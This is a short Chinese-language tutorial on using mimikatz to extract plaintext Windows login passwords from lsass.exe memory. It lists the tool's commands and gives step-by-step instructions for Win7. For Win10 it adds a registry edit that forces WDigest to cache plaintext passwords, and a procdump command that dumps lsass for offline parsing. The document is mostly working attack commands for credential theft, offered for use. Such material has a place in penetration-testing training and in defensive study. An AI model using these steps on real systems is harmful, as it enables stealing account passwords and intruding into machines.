mimikatz-windows使用指南

mimikatz-windows使用指南

一．程序原理
获取到内存文件 lsass.exe 进程 (它用于本地安全和登陆策略) 中存储的明文登录密码。
二．指令介绍

version查看mimikatz的版本
system::user查看当前登录的系统用户
system::computer查看计算机名称
process::list列出进程
process::suspend进程名称暂停进程
process::stop进程名称结束进程
process::modules列出系统的核心模块及所在位置
service::list列出系统的服务
service::remove移除系统的服
service::remove移除系统的服务
service::startstop服务名称启动或停止服务
privilege::list列出权限列表
privilege::enable激活一个或多个权限
privilege::debug提升权限
nogpo::cmd打开系统的cmd.exe
nogpo::regedit打开系统的注册表
nogpo::taskmgr打开任务管理器
ts::sessions显示当前的会话
ts::processes显示进程和对应的pid情况等
sekurlsa::wdigest获取本地用户信息及密码
sekurlsa::wdigest获取kerberos用户信息及密码
sekurlsa::tspkg获取tspkg用户信息及密码
sekurlsa::logonpasswords获登陆用户信息及密码

三．使用过程
1.win10以下
本次以实验Win7为例
①　右键使用管理员身份打开

②

privilege::debug

③

sekurlsa::logonpasswords

2.Win10
在Win10内禁止在内存缓存中保存明文密码
因此可以通过修改注册表选项，恢复明文密码
(1)方法一：
①　管理员身份运行cmd

②　修改注册表
修改完之后，重新登录账号，此时抓出来的密码就是明文显示
命令：
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

③

Shutdown -r -t 0

④　管理员身份运行mimikatz
⑤　输入命令，获取密码

(2)方法二：
①　修改注册表(与方法一基本相同)
②

Shutdown -r -t 0

③　使用程序procdump抓取dup文件
使用管理员身份打开cmd 并在程序的目录打开procdump.exe
命令：procdump64.exe -accepteula -ma lsass.exe 1.dmp

④　在通过mimikatz解析1.dup文件

注：mimikatz已经集成至Metasploit’s meterpreter,在kali中也可使用

参考文章： https://blog.csdn.net/Z_Z_W_/article/details/104063928
https://www.cnblogs.com/kuaile1314/p/12288476.html

网络信息安全-ploto